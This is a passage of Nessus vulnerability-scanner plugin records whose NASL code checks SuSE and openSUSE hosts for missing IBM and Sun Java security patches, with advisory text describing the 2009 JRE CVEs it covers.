script_id(43599);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-2493\", \"CVE-2009-3867\", \"CVE-2009-3868\", \"CVE-2009-3869\", \"CVE-2009-3871\", \"CVE-2009-3872\", \"CVE-2009-3873\", \"CVE-2009-3874\", \"CVE-2009-3875\", \"CVE-2009-3876\", \"CVE-2009-3877\");\n\n script_name(english:\"SuSE9 Security Update : IBM Java 1.5.0 (YOU Patch Number 12564)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 9 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"IBM Java 5 was updated to Service Refresh 11. It fixes lots of bugs\nand security issues. 
It also contains a timezone update for the\ncurrent Fiji change (timezone 1.6.9s).\n\nThe update fixes the following security issues : \n\n - A vulnerability in the Java Runtime Environment with\n decoding DER encoded data might allow a remote client to\n cause the JRE to crash, resulting in a denial of service\n condition. (CVE-2009-3876, CVE-2009-3877)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment audio system might allow an untrusted applet\n or Java Web Start application to escalate privileges.\n For example, an untrusted applet might grant itself\n permissions to read and write local files, or run local\n applications that are accessible to the user running the\n untrusted applet. (CVE-2009-3867)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with parsing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files, or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3868)\n\n - An integer overflow vulnerability in the Java Runtime\n Environment with reading JPEG files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files, or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3872)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing JPEG files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files, or run local applications that are accessible to\n the user running the untrusted applet. 
(CVE-2009-3873)\n\n - A security vulnerability in the Java Runtime Environment\n with verifying HMAC digests might allow authentication\n to be bypassed. This action can allow a user to forge a\n digital signature that would be accepted as valid.\n Applications that validate HMAC-based digital signatures\n might be vulnerable to this type of attack.\n (CVE-2009-3875)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3869)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3871)\n\n - An integer overflow vulnerability in the Java Runtime\n Environment with processing JPEG images might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3874)\n\n - The Java Runtime Environment includes the Java Web Start\n technology that uses the Java Web Start ActiveX control\n to launch Java Web Start in Internet Explorer. A\n security vulnerability in the Active Template Library\n (ATL) in various releases of Microsoft Visual Studio,\n which is used by the Java Web Start ActiveX control,\n might allow the Java Web Start ActiveX control to be\n leveraged to run arbitrary code. 
This might occur as the\n result of a user of the Java Runtime Environment viewing\n a specially crafted web page that exploits this\n vulnerability. (CVE-2009-2493)\n\nPlease also refer to http://www.ibm.com/developerworks/java/jdk/alerts\nfor more information about this update.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-2493.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3867.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3868.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3869.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3871.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3872.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3873.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3874.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3875.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3876.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3877.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply YOU patch number 12564.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n 
script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java JRE AWT setDiffICM Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(119, 189, 264, 310, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/12/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 9 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SUSE9\", reference:\"IBMJava5-JRE-1.5.0-0.76\")) flag++;\nif (rpm_check(release:\"SUSE9\", 
reference:\"IBMJava5-SDK-1.5.0-0.76\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:04:22", "description": "java-1_5_0-sun u22 update fixes the following security bugs :\n\n - CVE-2009-3864: CVSS v2 Base Score: 7.5\n\n - CVE-2009-3867: CVSS v2 Base Score: 9.3\n\n - CVE-2009-3868: CVSS v2 Base Score: 9.3\n\n - CVE-2009-3869: CVSS v2 Base Score: 9.3\n\n - CVE-2009-3871: CVSS v2 Base Score: 9.3\n\n - CVE-2009-3872: CVSS v2 Base Score: 10.0\n\n - CVE-2009-3873: CVSS v2 Base Score: n/a\n\n - CVE-2009-3874: CVSS v2 Base Score: 9.3\n\n - CVE-2009-3875: CVSS v2 Base Score: 5.0\n\n - CVE-2009-3876: CVSS v2 Base Score: 5.0\n\n - CVE-2009-3877: CVSS v2 Base Score: 5.0 For bug details\n use the CVE-ID to query the Mitre database at\n http://cve.mitre.org/cve please.", "edition": 25, "published": "2009-11-11T00:00:00", "title": "openSUSE Security Update : java-1_5_0-sun (java-1_5_0-sun-1529)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3864", "CVE-2009-3868"], "modified": "2009-11-11T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:java-1_5_0-sun-devel", "p-cpe:/a:novell:opensuse:java-1_5_0-sun-jdbc", "p-cpe:/a:novell:opensuse:java-1_5_0-sun", "cpe:/o:novell:opensuse:11.1", "p-cpe:/a:novell:opensuse:java-1_5_0-sun-alsa", "p-cpe:/a:novell:opensuse:java-1_5_0-sun-src", "p-cpe:/a:novell:opensuse:java-1_5_0-sun-plugin"], "id": "SUSE_11_1_JAVA-1_5_0-SUN-091109.NASL", "href": "https://www.tenable.com/plugins/nessus/42460", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted 
from openSUSE Security Update java-1_5_0-sun-1529.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(42460);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-3864\", \"CVE-2009-3867\", \"CVE-2009-3868\", \"CVE-2009-3869\", \"CVE-2009-3871\", \"CVE-2009-3872\", \"CVE-2009-3873\", \"CVE-2009-3874\", \"CVE-2009-3875\", \"CVE-2009-3876\", \"CVE-2009-3877\");\n\n script_name(english:\"openSUSE Security Update : java-1_5_0-sun (java-1_5_0-sun-1529)\");\n script_summary(english:\"Check for the java-1_5_0-sun-1529 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"java-1_5_0-sun u22 update fixes the following security bugs :\n\n - CVE-2009-3864: CVSS v2 Base Score: 7.5\n\n - CVE-2009-3867: CVSS v2 Base Score: 9.3\n\n - CVE-2009-3868: CVSS v2 Base Score: 9.3\n\n - CVE-2009-3869: CVSS v2 Base Score: 9.3\n\n - CVE-2009-3871: CVSS v2 Base Score: 9.3\n\n - CVE-2009-3872: CVSS v2 Base Score: 10.0\n\n - CVE-2009-3873: CVSS v2 Base Score: n/a\n\n - CVE-2009-3874: CVSS v2 Base Score: 9.3\n\n - CVE-2009-3875: CVSS v2 Base Score: 5.0\n\n - CVE-2009-3876: CVSS v2 Base Score: 5.0\n\n - CVE-2009-3877: CVSS v2 Base Score: 5.0 For bug details\n use the CVE-ID to query the Mitre database at\n http://cve.mitre.org/cve please.\"\n );\n # http://cve.mitre.org/cve\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://cve.mitre.org/cve/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=552581\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected java-1_5_0-sun packages.\"\n );\n 
script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java JRE AWT setDiffICM Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(119, 189, 310, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun-alsa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun-jdbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/11/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.1\", reference:\"java-1_5_0-sun-1.5.0_update22-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"java-1_5_0-sun-alsa-1.5.0_update22-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"java-1_5_0-sun-devel-1.5.0_update22-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"java-1_5_0-sun-jdbc-1.5.0_update22-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"java-1_5_0-sun-plugin-1.5.0_update22-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"java-1_5_0-sun-src-1.5.0_update22-0.1.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1_5_0-sun\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:03:12", "description": "java-1_5_0-sun 
u22 update fixes the following security bugs :\n\n - CVE-2009-3864: CVSS v2 Base Score: 7.5\n\n - CVE-2009-3867: CVSS v2 Base Score: 9.3\n\n - CVE-2009-3868: CVSS v2 Base Score: 9.3\n\n - CVE-2009-3869: CVSS v2 Base Score: 9.3\n\n - CVE-2009-3871: CVSS v2 Base Score: 9.3\n\n - CVE-2009-3872: CVSS v2 Base Score: 10.0\n\n - CVE-2009-3873: CVSS v2 Base Score: n/a\n\n - CVE-2009-3874: CVSS v2 Base Score: 9.3\n\n - CVE-2009-3875: CVSS v2 Base Score: 5.0\n\n - CVE-2009-3876: CVSS v2 Base Score: 5.0\n\n - CVE-2009-3877: CVSS v2 Base Score: 5.0 For bug details\n use the CVE-ID to query the Mitre database at\n http://cve.mitre.org/cve please.", "edition": 25, "published": "2009-11-11T00:00:00", "title": "openSUSE Security Update : java-1_5_0-sun (java-1_5_0-sun-1529)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3864", "CVE-2009-3868"], "modified": "2009-11-11T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:java-1_5_0-sun-devel", "p-cpe:/a:novell:opensuse:java-1_5_0-sun-jdbc", "cpe:/o:novell:opensuse:11.0", "p-cpe:/a:novell:opensuse:java-1_5_0-sun", "p-cpe:/a:novell:opensuse:java-1_5_0-sun-alsa", "p-cpe:/a:novell:opensuse:java-1_5_0-sun-src", "p-cpe:/a:novell:opensuse:java-1_5_0-sun-plugin", "p-cpe:/a:novell:opensuse:java-1_5_0-sun-demo"], "id": "SUSE_11_0_JAVA-1_5_0-SUN-091109.NASL", "href": "https://www.tenable.com/plugins/nessus/42457", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update java-1_5_0-sun-1529.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(42457);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", 
value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-3864\", \"CVE-2009-3867\", \"CVE-2009-3868\", \"CVE-2009-3869\", \"CVE-2009-3871\", \"CVE-2009-3872\", \"CVE-2009-3873\", \"CVE-2009-3874\", \"CVE-2009-3875\", \"CVE-2009-3876\", \"CVE-2009-3877\");\n\n script_name(english:\"openSUSE Security Update : java-1_5_0-sun (java-1_5_0-sun-1529)\");\n script_summary(english:\"Check for the java-1_5_0-sun-1529 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"java-1_5_0-sun u22 update fixes the following security bugs :\n\n - CVE-2009-3864: CVSS v2 Base Score: 7.5\n\n - CVE-2009-3867: CVSS v2 Base Score: 9.3\n\n - CVE-2009-3868: CVSS v2 Base Score: 9.3\n\n - CVE-2009-3869: CVSS v2 Base Score: 9.3\n\n - CVE-2009-3871: CVSS v2 Base Score: 9.3\n\n - CVE-2009-3872: CVSS v2 Base Score: 10.0\n\n - CVE-2009-3873: CVSS v2 Base Score: n/a\n\n - CVE-2009-3874: CVSS v2 Base Score: 9.3\n\n - CVE-2009-3875: CVSS v2 Base Score: 5.0\n\n - CVE-2009-3876: CVSS v2 Base Score: 5.0\n\n - CVE-2009-3877: CVSS v2 Base Score: 5.0 For bug details\n use the CVE-ID to query the Mitre database at\n http://cve.mitre.org/cve please.\"\n );\n # http://cve.mitre.org/cve\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://cve.mitre.org/cve/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=552581\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected java-1_5_0-sun packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", 
value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java JRE AWT setDiffICM Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(119, 189, 310, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun-alsa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun-jdbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/11/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.0\", reference:\"java-1_5_0-sun-1.5.0_update22-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"java-1_5_0-sun-alsa-1.5.0_update22-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"java-1_5_0-sun-demo-1.5.0_update22-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"java-1_5_0-sun-devel-1.5.0_update22-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"java-1_5_0-sun-jdbc-1.5.0_update22-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"java-1_5_0-sun-plugin-1.5.0_update22-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"java-1_5_0-sun-src-1.5.0_update22-0.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1_5_0-sun\");\n}\n", "cvss": {"score": 9.3, "vector": 
"AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:04:29", "description": "The Sun Java 6 SDK/JRE was updated to u17 update fixing bugs and\nvarious security issues :\n\nCVE-2009-3866:The Java Web Start Installer in Sun Java SE in JDK and\nJRE 6 before Update 17 does not properly use security model\npermissions when removing installer extensions, which allows remote\nattackers to execute arbitrary code by modifying a certain JNLP file\nto have a URL field that poi nts to an unintended trusted application,\naka Bug Id 6872824.\n\nCVE-2009-3867: Stack-based buffer overflow in the\nHsbParser.getSoundBank function in Sun Java SE in JDK and JRE 5.0\nbefore Update 22, JDK and JRE 6 before Update 17, SDK and JRE 1.3.x\nbefore 1.3.1_27, and SDK and JRE 1.4.x before 1.4.2_24 allows remote\nattackers to execute arbitrary code via a long file: URL in an\nargument, aka Bug Id 6854303.\n\nCVE-2009-3869: Stack-based buffer overflow in the setDiffICM function\nin the Abstract Window Toolkit (AWT) in Java Runtime Environment (JRE)\nin Sun Java SE in JDK and JRE 5.0 before Update 22, JDK and JRE 6\nbefore Update 17, SDK and JRE 1.3.x before 1.3.1_27, and SDK and JRE\n1.4.x before 1.4.2_ 24 allows remote attackers to execute arbitrary\ncode via a crafted argument, aka Bug Id 6872357.\n\nCVE-2009-3871: Heap-based buffer overflow in the setBytePixels\nfunction in the Abstract Window Toolkit (AWT) in Java Runtime\nEnvironment (JRE) in Sun Java SE in JDK and JRE 5.0 before Update 22,\nJDK and JRE 6 before Update 17, SDK and JRE 1.3.x before 1.3.1_27, and\nSDK and JRE 1.4.x before 1.4. 
2_24 allows remote attackers to execute\narbitrary code via crafted arguments, aka Bug Id 6872358.\n\nCVE-2009-3874: Integer overflow in the JPEGImageReader implementation\nin the ImageI/O component in Sun Java SE in JDK and JRE 5.0 before\nUpdate 22, JDK and JRE 6 before Update 17, and SDK and JRE 1.4.x\nbefore 1.4.2_24 allows remote attackers to execute arbitrary code via\nlarge subsample dimensions in a JPEG file that triggers a heap-based\nbuffer overflow, aka Bug Id 6874643.\n\nCVE-2009-3875: The MessageDigest.isEqual function in Java Runtime\nEnvironment (JRE) in Sun Java SE in JDK and JRE 5.0 before Update 22,\nJDK and JRE 6 before Update 17, SDK and JRE 1.3.x before 1.3.1_27, and\nSDK and JRE 1.4.x before 1.4.2_24 allows remote attackers to spoof\nHMAC-based digital signatures, and possibly bypass authentication,\nvia unspecified vectors related to 'timing attack vulnerabilities,'\naka Bug Id 6863503.\n\nCVE-2009-3876: Unspecified vulnerability in Sun Java SE in JDK and JRE\n5.0 before Update 22, JDK and JRE 6 before Update 17, SDK and JRE\n1.3.x before 1.3.1_27, and SDK and JRE 1.4.x before 1.4.2_24 allows\nremote attackers to cause a denial of service (memory consumption) via\ncrafted DER encoded data, which is not properly decoded by the ASN.1\nDER input stream parser, aka Bug Id 6864911.\n\nCVE-2009-3877: Unspecified vulnerability in Sun Java SE in JDK and JRE\n5.0 before Update 22, JDK and JRE 6 before Update 17, SDK and JRE\n1.3.x before 1.3.1_27, and SDK and JRE 1.4.x before 1.4.2_24 allows\nremote attackers to cause a denial of service (memory consumption) via\ncrafted HTTP headers, which are not properly parsed by the ASN.1 DER\ninput stream parser, aka Bug Id 6864911.\n\nCVE-2009-3864: The Java Update functionality in Java Runtime\nEnvironment (JRE) in Sun Java SE in JDK and JRE 5.0 before Update 22\nand JDK and JRE 6 before Update 17, when a non-English version of\nWindows is used, does not retrieve available new JRE versions, which\nallows 
remote attackers to leverage vulnerabilities in older releases\nof this software, aka Bug Id 6869694.\n\nCVE-2009-3865: The launch method in the Deployment Toolkit plugin in\nJava Runtime Environment (JRE) in Sun Java SE in JDK and JRE 6 before\nUpdate 17 allows remote attackers to execute arbitrary commands via a\ncrafted web page, aka Bug Id 6869752.\n\nCVE-2009-3868: Sun Java SE in JDK and JRE 5.0 before Update 22, JDK\nand JRE 6 before Update 17, SDK and JRE 1.3.x before 1.3.1_27, and SDK\nand JRE 1.4.x before 1.4.2_24 does not properly parse color profiles,\nwhich allows remote attackers to gain privileges via a crafted image\nfile, aka Bug Id 6862970.\n\nCVE-2009-3872: Unspecified vulnerability in the JPEG JFIF Decoder in\nSun Java SE in JDK and JRE 5.0 before Update 22, JDK and JRE 6 before\nUpdate 17, SDK and JRE 1.3.x before 1.3.1_27, and SDK and JRE 1.4.x\nbefore 1.4.2_24 allows remote attackers to gain privileges via a\ncrafted image file, aka Bug Id 6862969.\n\nCVE-2009-3873: The JPEG Image Writer in Sun Java SE in JDK and JRE 5.0\nbefore Update 22, JDK and JRE 6 before Update 17, and SDK and JRE\n1.4.x before 1.4.2_24 allows remote attackers to gain privileges via\na crafted image file, related to a 'quantization problem,' aka Bug Id\n6862968.", "edition": 25, "published": "2009-11-19T00:00:00", "title": "openSUSE Security Update : java-1_6_0-sun (java-1_6_0-sun-1541)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3866", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3865", "CVE-2009-3877", "CVE-2009-3864", 